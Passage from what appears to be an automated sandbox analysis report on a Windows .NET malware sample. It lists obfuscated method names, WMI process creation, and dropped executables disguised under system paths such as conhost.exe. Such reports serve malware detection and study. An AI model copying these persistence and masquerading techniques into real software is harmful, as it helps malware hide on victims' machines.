                          Source: 3XtEci4Mmo.exe, q5km0q8gEjVRaq6Ukfd.csHigh entropy of concatenated method names: 'HqX81IXv21', 'iLi89XpKKU', 'a3R8Jqxn2y', 'EW683xRir5', 'Qql8UWWZ6D', 'nEIioj5S7E6ryfcv8pqE', 'sxb7A65SQSTTXpJsWosV', 'glPRKD5SFnvJ9bgGdAOq', 'lGGKkd5SB00lYn9ElUcV', 'T5gplw5SlNMBDwreui9U'
                          Source: 3XtEci4Mmo.exe, mBGA4WLQBRwF5t0TP0v.csHigh entropy of concatenated method names: 'j14UvY5M8xgaaeHImHwb', 'I7Oe4v5Mw6b3AYk7xI9c', 'K4dK6Q5MjJK7Bvf8pN3f', 'e69cex5MIRiBEiGhvIAR', 'DnoLkM5MWtFsPKlO6JBS', 'l6PN7b5MH4O4IXtBBDXx', 'AlpuG55MRZI848WePJqD', 'HgrXkI5MncVZruoA5d71'
                          Source: 3XtEci4Mmo.exe, kF6XgludTPm0j2QyyMh.csHigh entropy of concatenated method names: 'gugUG85Zw5uXtDB4HupC', 'MhXqAX5ZjenSWbpyUaZX', 'Tn5SjI5Z8xZoCO1CDQUL', 'go2uAxSiu9', '_1R8', '_3eK', 'Cvxuype6RQ', 'SIau6enlsW', 'FNGuX94BwU', 'pLAuffsSOm'
                          Source: 3XtEci4Mmo.exe, oZYRFMZhkE9GpIp6qkM.csHigh entropy of concatenated method names: 'ktr5A4M2ofS', 'H1KZMcAHfw', 'XuyZveOgWG', 'mxnZ20Xhp9', 'LH1tCC5vHejEyJOmPyfR', 'DloQVt5vmT5rgkU8AvUt', 'Usju1b5vwin0udXRuphZ', 'AnPPDn5vj5eJOG1UKIQy', 'Qee7NC5v80mlZ7NuUv7S', 'q02TbT5vsOeyJRm4y1eA'
                          Source: 3XtEci4Mmo.exe, l3hDFap7Qgb0LsGUNsw.csHigh entropy of concatenated method names: 'xD6pFFLdb9', 'qnvpqSdWkc', 'J6kUMN5jV3UqxciqcgQW', 'uoebHK5j5eDKX8USqvJe', 'CAHBg55jpYi2yrfMZInQ', 'wPQ52a5jDNx7oVCk4bwQ', 'ghE6J05jObRDGPkh7cx2', 'brXKkE5jdQ5FxKbiYKyL', 'vgGRV15jc7lDGG8P8bx0'
                          Source: 3XtEci4Mmo.exe, XLIn7vXqk0V4LZH8oiD.csHigh entropy of concatenated method names: 'Np6XndSTTO', 'nciXIUVFl2', 'fYrXWi8mfR', 'dh2SgA5LFeOP5V7swfsK', 'nk2tqQ5L7SgWdqT2IlCQ', 'UyG0W45LQZsiu5m160wO', 'pNkQYG5LqyFbnmn2jHLS', 'a79X165LRZkvIY84Kh5a'
                          Source: 3XtEci4Mmo.exe, tPqxrngJalv5aGYnGH0.csHigh entropy of concatenated method names: 'KbdgUQ8L63', 'WFWgiYpu25', 'dpCg4yQEJO', 'arWge7E1wk', 'VSVgYvtETL', 'kIVgSaGN6M', 'QaIgZALOcJ', 'OsYghMdkWo', 'sXEgG0pk6H', 'EBrgMTZ1Yr'
                          Source: 3XtEci4Mmo.exe, Xsl8b9BpKQUglufWkHL.csHigh entropy of concatenated method names: 'Yu1BB0w9nK', 'TqrB7w0Rbd', 'fUsBDVnrrW', 'gCLBOjVXIQ', 'DlsBdmiWW0', 'l0HBcovaT6', 'B5mBA4uBIy', 'QLRByfjmm2', 'bcUB6ZJfTL', 'tWiBXJg0pD'
                          Source: 3XtEci4Mmo.exe, s08bGFV6rL8qQcpH8lx.csHigh entropy of concatenated method names: 'x4ZVfpCTX3', 'W8TVt4OCik', 'EKSVKNhKAe', 'ieUw2T5jGPHSfLR7iPRs', 'AKyG6U5jMJ8wXeCWgsIj', 'ByutWE5jZbMmRVu7luls', 'ArFvrW5jhl61O61TYKZt', 'Vk68Py5jvNRNPHUOLSrp', 'UdUloh5j2jwc6QIq2uve', 'ogEWPY5jTPRflABqgoOR'
                          Source: 3XtEci4Mmo.exe, E5nuhORPK26ehrobi7G.csHigh entropy of concatenated method names: 'fhVmWhxDjw', 'rNDmH8P2gH', 'jXoJVP54wWtVKttQFkTj', 'Mwt1rO54HQbp2W2QyHSc', 'vkwdhE54mpIk7pq3c1F2', 'DQvwWO54jFvF0Trd9CO5', 'lybNdM548CPfqyRsvMPn', 'XkymuSmlem', 'eGe2jc54Ev2Se9BAE30R', 'fhxNQI54uBJyt2lUDHPS'
                          Source: 3XtEci4Mmo.exe, nfGD2cdcn7Qr7srILIp.csHigh entropy of concatenated method names: 'eGJdQxPidg', 'IKkdFNjjdX', 'EahYTq5kOcH5jJWa0Cox', 'qYWNbo5kVaxBenLqlSXT', 'Wvsvtx5kDSDZiDbQUtIL', 'DySbEe5kdP9Dg0tteiOk', 'uZxdBtvFcB', 'oJEdl32udc', 'DJKxEF5kabAZGpFOt45N', 'i3ABR65uCRP1xwi7Ygkh'
                          Source: 3XtEci4Mmo.exe, aFNsOOvfK8BbTEgAgLp.csHigh entropy of concatenated method names: 'FCOvKyOdG5', 'lU4voCtNgF', 'LMtv0SG0OM', 'P8mvrjdiQV', 'DrpvBLy1fy', 'JV8vlly9YP', 'uvRSZP5x3f0XJ2VbZLwO', 'YGVXRO5xUvQxE0DBHBTb', 'zdrpCR5xiGs1QUMu0VBV', 'qiUVV75x4naFX7kLXAvH'
                          Source: 3XtEci4Mmo.exe, hfliQdD9Fko5UK7RNgE.csHigh entropy of concatenated method names: 'lT5DSEo2j9', 'giMCQX5s3JiAV0pSjGL4', 'Llo4Is5s9PA4QcDFNIUE', 'zKipK85sJq02OJLtDhG5', 'vq8D3yHefL', 'hVjDU31Lwx', 'VrDDiRS2RT', 'BCiV4S5sPAF7t4pAX9x3', 'N7xbrE5sgJ02aGeEYv58', 'OXaRgn5sEosctBaEs1ZC'
                          Source: 3XtEci4Mmo.exe, fVrei9DbbYK51gqX9F7.csHigh entropy of concatenated method names: 'u9fDgGjbR8', 'IiiDLGuXv3', 'vi0tCy5swgdPHWYEIXiY', 'ucJQBt5sHMdj6IPn9xXQ', 'sps8Qk5smFBWCJFnwTHR', 'wHaOKu5sjhOS6p3mYHRc', 'e5ChTZ5s81p0QftVBn52', 'Yxwotg5ssmeLMW7vbdbq', 'hDTkWI5suKstrLbnRTc9'
                          Source: 3XtEci4Mmo.exe, SDjHkmys5LI5U0oZE4r.csHigh entropy of concatenated method names: 'juSy97bqOL', 'nYNuSN5PlANmG3XQZ8DT', 'yknBGt5Pr2Je6LjfiogD', 'mFKunK5PB3bMQv7IwfRR', 'TYOHei5P7ggaGxr6JAOZ', 'nqjdv55PQndSNTrua8rC', 'UU8', 'd65', 'AAM5DKGjmdv', 'DS95Do0qs65'
                          Source: 3XtEci4Mmo.exe, asA0OvGDDNsByyUxtuK.csHigh entropy of concatenated method names: 'ViQGdlXuDC', 'gpYGccC7rx', 'FcDGAsHGaZ', 'FqtGy5l304', '_0023Nn', 'Dispose', 'mMT8oW52vibDDse2pn0l', 'osJWVZ52Gbs4jRiASvnr', 'KC3qQj52MbjUkCfn1pGf', 'dAZfob522FaFs1YNOKlZ'
                          Source: 3XtEci4Mmo.exe, F5vhKUwGHbUt17hYG7Q.csHigh entropy of concatenated method names: 'Xaawvglh07', 'EpAw2vCm1T', 'C7xwTVopvo', 'NL7wx0oSsw', 'x5AwNnc0RQ', 'ssUwC4aQkM', 'kprwzkIi1S', 'RfXjaCsC4H', 'Ytqj5sBaSS', 'VRMjplUm4N'
                          Source: 3XtEci4Mmo.exe, m07ytYGtXWB3pfhpDEw.csHigh entropy of concatenated method names: 'ENX5dgXsZN4', 'DR75dLhj8f2', 'vLO5d1jRKdf', 'rVV1sg5TjqBhrSEENHPE', 'K7JQMX5TmrC4JwLuKb99', 'Pg0vKr5Twxq6mncMJl7b', 'mrfp3m5T8NOrxDk4HLe2', 'zpb5AecVaEQ', 'DR75dLhj8f2', 'l1Kmqw5TERXdQOj47EIM'
                          Source: 3XtEci4Mmo.exe, FAD6y0Xdfe4MBir2is1.csHigh entropy of concatenated method names: 'MwD7xS5LrKagr5WenBJS', 'N9aMrK5LBHW6bS41MuAo', 'q42aHI5LopjFowq2RZeL', 'w2QlrU5L072vrWv8iFiG', '_7kT', '_376', 'unRXASP8X2', 'ycEXyxqkMt', '_4p5', 'iR2X62FIZ3'
                          Source: 3XtEci4Mmo.exe, cyNuh1yzG8uZcwFXgYU.csHigh entropy of concatenated method names: 'tGK6dghZ1y', 'zXK8n55PiAtbAuJScvZQ', 'eXR3dP5P3pRbCfqmnJug', 'aWZThH5PUPml3OCycNvs', 'mlsPTL5P4n4oKWIpaaGo', 'eq7', 'd65', 'Em85DFZuEWJ', 'GZ45DqdS7RB', 'Plt5AskuhoP'
                          Source: 3XtEci4Mmo.exe, jRc4nXglZYDTnODofYb.csHigh entropy of concatenated method names: 'sgSgQ7F7CB', 'CMFgFYN3Pr', 'TQwgqUrkQe', 's24gRVrkJK', 'QrggnwfEvo', 'ReNgICjXLT', 'JAWgWhUEup', 'TF0gHvZQnm', 'BaagmIxcfd', 'x83gwSIQW7'
                          Source: 3XtEci4Mmo.exe, hHOVqk5YEU4MawvCC36.csHigh entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'g085AlYwbTn', 'CYD5VZdZcft', 'ch3AQX5wREiwEaqOES7M', 'qFewap5wnkDgWGNa1TUo', 'LG4pxH5wI95xZBMa7Nig'
                          Source: 3XtEci4Mmo.exe, QCySVEdiWkU3blmMX9X.csHigh entropy of concatenated method names: 'wqWcaMbrf1', 'Wf9c5uxBvb', 'GKacpyqIwJ', 'VPQI4g5kv7slDCNAmfGL', 'wY2TrJ5kG2GtXNo3PowJ', 'db47GO5kM2GQUNvMAdYw', 'v4UM885k22ekL2hjTt7n', 'Bgxdev6f6D', 'sQCdYEgBEf', 'juEdSM1EGQ'
                          Source: 3XtEci4Mmo.exe, sgAVbbDhtyYTBCw1jW0.csHigh entropy of concatenated method names: 'GFeDNWDi66', 'hInDCwfK2M', 'pPiDzQBwJW', 'hluoKf5sh6jd8TywANee', 'XolcC65sGd5DOMt6hTkH', 'iMPfSt5sSm0ob5vKRBws', 'lKu6ZJ5sZUijrt6Hh0TP', 'ukSDMxSJyw', 'DIqDvK2TYL', 'J5VD2H1Yvc'
                          Source: 3XtEci4Mmo.exe, CQajfxAYkA8eMvQ1Ymy.csHigh entropy of concatenated method names: 'QQwAvgefdv', 'RtsA2vnyIe', 'GIwATK9rSl', 'PL4Axi1AA0', 'xVWANZkKZT', 'OrbACJ2GsK', 'OixAz35oHX', 'MPHDse5bug8RCubvhrPn', 'otp5BO5bkltVduODkLwi', 'G1QNOH5b8TapUhvdVlvq'
                          Source: 3XtEci4Mmo.exe, YSVUuphWulIitZbBJEM.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'EkVhmMyDIB', 'aVDbvO52RyQ522Vf45NG', 'ITWmxL52nW5ed8nEkFRx', 'cBbe0C52IHsPUK431Buh', 'FqppfN52WZnjjQGVukaD', 'pd8NuE52HAIgklUBHARN', 'rm82UA52mOKwGqdcQ9Yq'
                          Source: 3XtEci4Mmo.exe, YJwkLXcn20QsXM7ClFh.csHigh entropy of concatenated method names: 'UcLc8NsRTv', 'HEZwhC5E72Kt9FYIoEEb', 'hLOMQC5EQVx4bf7ESnZD', 'BWS0il5EBUmCCwJ0MqZ2', 'AHQkO95El1aWd6gZnZPF', 'E39cW3KK95', 'rW2ftY5EtBPS1cudMD3H', 'ztanhE5EXMHal233fDMs', 'ChIjQ65EfXFiQl8Yx4Rc', 'C6SH8L5EK5iiKCgODMq7'
                          Source: 3XtEci4Mmo.exe, yR56RW6L2tdX3w6ffRQ.csHigh entropy of concatenated method names: '_2SY', 'zwM5APpik7K', 'OZp69Rtg7p', 'E5A5AgEpVle', 'RutIte5gItLBJcZNixFf', 'zkp4gm5gW9dlQhqdMM8k', 'zcAUeQ5gR2Ujj62ZKW39', 'zQU0ur5gnA7Mif2jmgME', 'RFgVWa5gHTveYQ5IkQhv', 'tmoXwG5gmRMuN490lOE1'
                          Source: 3XtEci4Mmo.exe, OC926awQ1HB6XDjlaeZ.csHigh entropy of concatenated method names: 'DFCwqtkGYm', 'ohOwRjmkjf', 'CcMwnRLZb1', 'fZhwIpY04X', 's2JwWWwdOv', 'fSkwHoSmgl', 'OlKTnS5eoPTGg0SLhgOC', 'NjZHTx5etZ3xHjvocRYH', 'WPusv05eKV8UryBDIT8W', 'IV6Ujl5e0J96fliv0ZAb'
                          Source: 3XtEci4Mmo.exe, pCP37MhTpTvIE9CqaM9.csHigh entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'TYThNDlFZv', 'GbxhC3kCtO', 'Jjfhz81EP8', '_0023Nn', 'Dispose', 'fnxsk5524hHhjl17Xngl', 'PM23hV52eqNeEM0x6b4B'
                          Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.csHigh entropy of concatenated method names: 'v4xPgF5NFW44T0RhoVEK', 'wGffMM5NqpXJqEOprG8T', 'fNKxx9Hqt0', 'KmiucI5NWpmWkJ2iZ8DF', 'RTJ9Mw5NH1kNIoKvOLa2', 'dvaiMu5NmIkhxuSUoDHD', 'nXcRcW5Nww7LsM6MnKPw', 'POubny5NjXXHmpwhQpTA', 'DoBmDJ5N87PlZOE7l4qY', 'GF5d0F5Ns0WNYd7fy7f1'
                          Source: 3XtEci4Mmo.exe, DKZcf0Nqhvbh4r4fMkI.csHigh entropy of concatenated method names: 'oXJNk60gtv', 'rBeNElAw47', 'ns5NbaYuE5', 'Y5fNPa9HKT', 'sWdNg7DZ4r', 'FKINLCbJxa', 'KQYN1cwcT8', 'CsVN9kjue5', 'unkNJpDPM4', 'wvSN3E06f1'

                          Persistence and Installation Behavior

                          barindex
                          Creates processes via WMI
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\ucDhZRLu.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\qwPLRqWX.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\ThILVSlx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\FAtHPtxq.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\ZrGvzZJn.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QWdyfgGf.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\udiCoAET.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QXRfkjyW.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\dVnCFeff.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Program Files\Google\Chrome\Application\conhost.exeJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\wFqSLbvP.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\xLpaQOdH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\tmGCYmXQ.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\zhcyQjUk.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\rmNqRUKB.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\bQGwUejE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QImfPxDF.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\BargBgFj.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\bcXTThuh.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\LBbeHZkL.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\WBPEscIu.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\sTDIJUfq.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\XQlMiBJi.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\EVQZcBiW.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\sRYTiegb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\LCxGrujI.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\TfOoGCsS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\rNFADhxz.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\OlTNIjCM.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\WgiUHyMw.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\jGLeSKCo.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\VkvurCps.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\Zallyypm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\yUQAQjKk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\pKSShysD.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kOdTVPKT.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\KVHoAvPS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\HDgqkcCm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\FizIvULx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QujYzohZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\npJJQJjz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\RGOnlxSA.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\EEJGOfpT.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\twjrRmqB.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\HTUGeMKX.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\mzvrpXvN.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\AfaiVEic.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\pyJigHPD.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\afwLyhfm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\lnWbuaeE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\RmrNprNr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\exStwvKV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\UXWdwFYk.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\mHfKTHWS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\VZRFxCWH.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Recovery\conhost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\xfqPuAPp.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\gPpSweJV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SDpvGwhv.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\BwYQnKCg.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SYQgAPKa.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SingkCdX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\BnpyIbbb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\NPXweASH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\swyioMDw.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kHClnwJL.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\XjnFxUBI.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kuPmEXym.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\fSOKaeua.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\uuKznmFw.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\XmhcMluo.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\MgnHXjFm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QNGyvuni.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\jybLobci.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\IrkyWqxk.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\FQiXIcGc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\pHCSiMBb.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\twjrRmqB.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\rmNqRUKB.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\afwLyhfm.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\Zallyypm.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\HTUGeMKX.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\xfqPuAPp.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\fSOKaeua.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\VkvurCps.logJump to dropped file
